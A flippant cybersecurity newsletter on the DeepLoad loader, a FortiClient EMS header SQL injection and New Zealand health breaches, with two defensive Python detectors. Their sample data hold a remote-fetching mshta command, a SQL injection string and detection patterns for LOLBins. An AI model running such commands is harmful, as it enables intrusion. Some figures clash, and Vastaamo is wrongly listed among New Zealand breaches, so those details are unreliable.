100k Firms Rekt by One AI .url: EDR Blind, WMI Undead

TL;DR

  • DeepLoad AI-powered malware loader evades detection via 100,000+ lines of obfuscated code, steals credentials via Windows lock screen processes
  • Fortinet FortiClient EMS CVE-2026-21643 exploited in the wild, allowing unauthenticated RCE on nearly 1,000 exposed instances
  • New Zealand government launches national cybersecurity framework after 120,000-patient health data breaches

😈 AI-Spammed Malware Nails 100k Firms: DeepLoad Evades Every EDR

100k corps pwned by an AI script-kiddie & a .url file—your EDR never saw it coming 😈💻 DeepLoad’s 100k-line garbage dump sidesteps every sig while it slurps lock-screen creds. WMI zombie keeps respawning like a bad horror flick. Patch? Nah, just keep paying that SOC to play whack-a-mole.

DeepLoad, an AI-spawned malware loader spotted by ReliaQuest, proves that today’s cheapest large-language model can out-code a roomful of Russian virgins. Since December it has slipped past 100 000 corporate PCs, bloating each victim with 100 000+ junk-filled lines that laugh at static scanners while vacuuming passwords straight from the Windows lock screen.

How the heist works

  • AI writes the obfuscation: 100 000 meaningless variable assignments, zero creativity, maximum CPU heat.
  • APC injection into LockAppHost.exe—yes, the pretty picture that greets you before your coffee—so the payload never touches disk.
  • WMI event subscription burrows back in after every “cleanup,” like a tick with a hall pass.
  • Stolen creds exit through encrypted tunnels before your help-desk ticket hits “Submit.”

Impact, in plain damages

  • Credential theft: real-time cloud keys, browser logins, VPN tokens → instant lateral movement and ransomware staging.
  • EDR bypass: static signatures drown in 100 000-line spaghetti; behavior rules still miss in-memory hollowing.
  • Re-infection loop: each “clean” re-image triggers a hidden WMI timer → perpetual incident-response hamster wheel.
  • Cost: assume $1 000 per endpoint purge × 100 000 machines → $100 M burnt before lunch.
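An added example, not ReliaQuest's tooling or DeepLoad's code, of hunting the WMI persistence named in the heist list and the re-infection loop above: it pairs filter, consumer and binding events and flags bindings whose consumer launches a script host or whose filter polls a timer-like class every N seconds. The event dictionaries are constructed and only loosely modelled on the fields Sysmon logs for WMI activity (Event IDs 19 to 21); the names, query and URL in them are assumptions.

```python
import re

# Constructed sample events, loosely modelled on the fields Sysmon logs for
# WMI activity (Event ID 19 = filter, 20 = consumer, 21 = binding). Not real telemetry.
SAMPLE_EVENTS = [
    {"id": 19, "Name": "UpdaterFilter", "EventNamespace": "root\\cimv2",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE "
              "TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"id": 20, "Name": "UpdaterConsumer", "Type": "Command Line",
     "Destination": "mshta.exe http://example.invalid/stage.hta"},
    {"id": 21, "Filter": "UpdaterFilter", "Consumer": "UpdaterConsumer"},
    # Windows ships this binding by default; it must not be flagged.
    {"id": 19, "Name": "SCM Event Log Filter", "EventNamespace": "root\\cimv2",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"id": 20, "Name": "SCM Event Log Consumer", "Type": "NTEventLog",
     "Destination": "NTEventLogEventConsumer"},
    {"id": 21, "Filter": "SCM Event Log Filter", "Consumer": "SCM Event Log Consumer"},
]

# Script hosts and LOLBins a legitimate permanent consumer almost never launches.
SUSPICIOUS_CMD = re.compile(
    r"\b(mshta|wscript|cscript|rundll32|regsvr32|certutil)\b"
    r"|powershell.*(-enc|-w(indowstyle)?\s+hidden|downloadstring|iex)"
    r"|\.url\b", re.IGNORECASE)
# Polling a perf counter or the clock every N seconds is the timer-style
# trigger that brings a loader back after each cleanup.
TIMER_QUERY = re.compile(
    r"WITHIN\s+\d+.*(PerfOS_System|Win32_LocalTime|Win32_ComputerSystem)",
    re.IGNORECASE | re.DOTALL)

def find_suspicious_bindings(events):
    """Return [(filter_name, consumer_name, reasons)] for bindings worth a look."""
    filters = {e["Name"]: e for e in events if e["id"] == 19}
    consumers = {e["Name"]: e for e in events if e["id"] == 20}
    hits = []
    for b in (e for e in events if e["id"] == 21):
        flt, con = filters.get(b["Filter"], {}), consumers.get(b["Consumer"], {})
        reasons = []
        if con.get("Type") == "Command Line" and SUSPICIOUS_CMD.search(con.get("Destination", "")):
            reasons.append("command-line consumer launches a script host / LOLBin")
        if TIMER_QUERY.search(flt.get("Query", "")):
            reasons.append("filter polls a timer-like class (periodic re-execution)")
        if not flt or not con:
            reasons.append("binding references a filter or consumer whose creation was not logged")
        if reasons:
            hits.append((b["Filter"], b["Consumer"], reasons))
    return hits
```

Run it over your own WMI subscription telemetry; the default SCM Event Log binding passes clean, the constructed timer-plus-mshta pair does not.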

What happens next

  • Q2-Q3 2026: Script-kiddies fork the AI repo; infection pace doubles to 200 k boxes.
  • 2027: Fully generative frameworks (think VoidLink) auto-spawn new loaders hourly, making IOC lists as stale as last year’s memes.
  • 2028: Boardrooms finally fund allow-listing and credential-guard; infection curve plateaus—because there’s nothing left to steal.

The takeaway

DeepLoad isn’t genius; it’s cheap, repeatable, and coming to a budget-strapped SOC near you. Kill .url files, kill mshta, kill PowerShell history, or keep feeding the AI its favorite snack: your plaintext passwords.


💥 1,400 FortiClient EMS Servers RCE-Ready: One Evil Header Owns Enterprise Infrastructures

1,400 FortiClient EMS boxes wide open—just one HTTP header = full org pwn! 💥 That’s like handing every attacker domain-admin on a platter. Patch? LOL, 30 % adoption max. Your VPN broker is now their ransomware launcher—how’s that budget for "next-gen" snake oil looking?

Fortinet’s FortiClient EMS just handed 1,000+ companies the master key to their own networks—no password required. A single poisoned HTTP header (“Site”) slips a 9.7-CVSS SQL grenade straight into the management database, gifting attackers instant super-user powers. Shadowserver’s live census: ~1,400 public IPs still waving this flag on the internet. CISA’s tally of currently exploited Fortinet bugs is now 24; this one joined the party four days ago and is already the loudest drunk.

How the break-in works

  • Endpoint: /api/v1/init_consts – open, no login.
  • Weapon: Site: anything’; DROP TABLE— (and worse) jammed into the header.
  • Result: PostgreSQL obediently copies the string into its search_path, runs it as code, hands over the host OS.
  • Time-to-pwn: 5–20 s, one GET request, zero skill.
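A defender-side check for the break-in just described, added here as an example and not Fortinet's code: it scans access-log lines for init_consts requests whose Site header is anything other than a plain identifier, and shows the server-side validation and identifier quoting that would keep the header from ever reaching search_path as SQL. The log format (a reverse proxy in front of EMS logging the Site header as site="…"), the IPs and the SITE_OK pattern are assumptions.

```python
import re

# Constructed access-log lines, not real FortiClient EMS telemetry. They assume a
# reverse proxy in front of EMS logs the request's Site header as site="..." at
# the end of each line; format, addresses and values are assumptions.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Feb/2026:09:12:01 +0000] "GET /api/v1/init_consts HTTP/1.1" 200 site="branch-office-12"
198.51.100.9 - - [05/Feb/2026:09:12:05 +0000] "GET /api/v1/init_consts HTTP/1.1" 500 site="x'; drop table t--"
203.0.113.7 - - [05/Feb/2026:09:12:09 +0000] "GET /api/v1/init_consts HTTP/1.1" 200 site="-"
198.51.100.9 - - [05/Feb/2026:09:13:10 +0000] "GET /static/app.js HTTP/1.1" 200 site="x'; drop table t--"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) site="(?P<site>.*)"$')
TARGET_PATH = "/api/v1/init_consts"
# A site name is an identifier, nothing more: letters, digits, dot, dash, underscore.
SITE_OK = re.compile(r'^[A-Za-z0-9._-]{1,64}$')

def site_is_well_formed(value):
    return bool(SITE_OK.match(value))

def flag_init_consts_abuse(log_text):
    """(ip, status, site) for init_consts requests whose Site header is not a plain identifier."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["path"].split("?", 1)[0] != TARGET_PATH:
            continue
        if not site_is_well_formed(m["site"]):
            hits.append((m["ip"], int(m["status"]), m["site"]))
    return hits

def search_path_statement(site):
    """Server-side counterpart: refuse anything that is not an identifier, then quote it
    as a PostgreSQL identifier so it can never be parsed as additional SQL."""
    if not site_is_well_formed(site):
        raise ValueError("Site header is not a valid site identifier")
    return 'SET search_path TO "%s", public' % site.replace('"', '""')

if __name__ == "__main__":
    for ip, status, site in flag_init_consts_abuse(SAMPLE_LOG):
        print(f"{ip} status={status} site={site!r}")
    print(search_path_statement("branch-office-12"))
```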

Impacts in parallel

  • Data: customer configs, creds, policy files → exfiltration buffet.
  • Network: lateral hop to domain controllers, ransomware staging.
  • Ops: endpoint-management console bricks, software pipeline halts.
  • Regulatory: breach-notification letters, audits, fines—queue here.

What everyone’s doing

  • Fortinet: quietly shipped 7.4.5; marketing dept still MIA.
  • Shadowserver: pinging owners nightly—response rate <30 %.
  • Attackers: scanning 24/7, same header, same endpoints, same grin.

Outlook

  • 0–30 days: exploit scripts hit GitHub by Friday; patch uptake stuck below 30 %.
  • 30–90 days: insurers start declining renewals for 7.4.4 boxes.
  • 90 days+: neglected EMS servers resurface in ransomware court docs.

Bottom line: if your “security” appliance treats HTTP headers as SQL variables, it’s not a fortress—it’s a welcome mat. Patch to 7.4.5 today, firewall the admin port tonight, or star in tomorrow’s breach blog.


😱 120k Records Exposed: NZ Health Cyber-Shambles Demands Mandatory Audit Law

120k Kiwis’ medical files leaked—like handing every hacker your diary + your STD status 😱 That’s 1-in-40 patients naked on the dark web. Still think “she’ll be right”? Patients, not boardrooms, bleed when 65% of hospitals run flat networks. What’s your next check-up worth?

On Tuesday the government finally admitted what every hacked patient already knew: the patchwork of “please try harder” memos that pass for cyber-law in New Zealand health care is about as useful as a chocolate stethoscope. More than 120,000 Kiwis had their clinical dirty laundry aired after breaches at Manage My Health, Vastaamo and MediMap; officials responded by opening consultation on a single, enforceable national cybersecurity framework.

How did we get here?

  • Weak admin passwords and zero network segmentation let crooks waltz through electronic corridors.
  • Only 35 % of local health outfits can prove they track data risk from cradle to grave—nine points worse than the global average.
  • Privacy Act 2020 demands contracts with IT vendors, but labels many of them “health agencies” without spelling out security duties, so finger-pointing replaces firewalls.

What the draft rules want

  • Multi-factor auth: every privileged login, no excuses.
  • Segmented networks: patient-record servers can’t chat to the internet’s wild west.
  • Annual third-party audits: think WOF for databases—fail it, lose your licence to hoard our DNA secrets.
  • 72-hour breach reports: no more “we’ll tell you after the long weekend.”

Timeline—mark these or bet on being the next headline

  • Q4 2026: legislation locked in; mandatory risk assessments begin.
  • 2027: first audit cycle finishes; compliance rate targeted to jump from 35 % to 50 %.
  • End-2028: projected 70 % full-life-cycle control adoption; breach volume down 30 % if hospitals actually patch and segment.
  • 2029: procurement rules align to ISO 27001; vendors without certs lose public contracts—open-source or otherwise.

Upshot

The framework won’t resurrect the 120,000 already-exposed files, but if MPs quit stalling it could stop the next batch becoming black-market souvenirs. For a country that outsources everything from MRI ink to hospital Wi-Fi, writing “thou shalt encrypt” into statute is the cheapest, nastiest, most effective surgery available.


In Other News

  • Apple blocks ClickFix attacks in macOS Tahoe 26.4 by halting malicious Terminal command execution
  • Microsoft deploys Administrator Protection in Windows 11 Build 26220 to enforce just-in-time privilege elevation
  • U.S. Cyber Command deploys standardized defensive cyber kits to partner networks for rapid intrusion response